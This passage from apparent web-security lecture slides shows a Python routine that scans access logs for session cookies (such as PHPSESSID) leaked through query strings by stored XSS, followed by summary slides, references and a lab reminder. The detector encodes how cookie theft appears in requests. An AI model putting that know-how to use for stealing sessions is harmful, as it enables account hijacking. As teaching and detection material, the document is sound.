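    """Decode the query string of a request target and split it like a Cookie header.

    document.cookie yields 'name=value; name=value', and the browser percent-encodes
    the space as %20, so after unquote the query looks like a Cookie header again.
    """
    query = unquote(urlsplit(target).query)
    pairs = {}
    for part in query.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs[name] = value
    return pairs


def find_cookie_exfil(log_text):
    """Return one record per log line whose query string carries a session cookie."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        pairs = cookie_pairs_in_query(m["target"])
        leaked = {n: v for n, v in pairs.items() if n in SESSION_COOKIE_NAMES}
        if leaked:
            hits.append({"victim_ip": m["ip"], "time": m["ts"], "leaked": leaked,
                         "all_pairs": pairs})
    return hits


if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(hit["time"], hit["victim_ip"], "leaked", hit["leaked"])
```

In the sample, two different client addresses leak a PHPSESSID, matching the lecture's point that every visitor to the stored-XSS page is hit; a real deployment would alert on the first such line and revoke the affected server-side sessions.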
We will talk about Reflected XSS and XSS Defence in
our next lecture.

Example Short Answer Question for this lecture:
■ List the six attributes that a cookie can have.

80
Lecture Summary
■ Understanding how cookies work is very important.
■ An intercepting web proxy is an essential tool for web
hackers.
■ Stored XSS attacks manage to store malicious JS code in
a website's database, and can harm any user who
accesses this website.

81
References
■ HTTP Cookie: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
■ ZAP User Guide: https://www.zaproxy.org/docs/desktop/
■ XSS attacks: https://en.wikipedia.org/wiki/Cross-site_scripting

Big reminder:
• Lab 10 will be due next week. Please start it
asap!

82
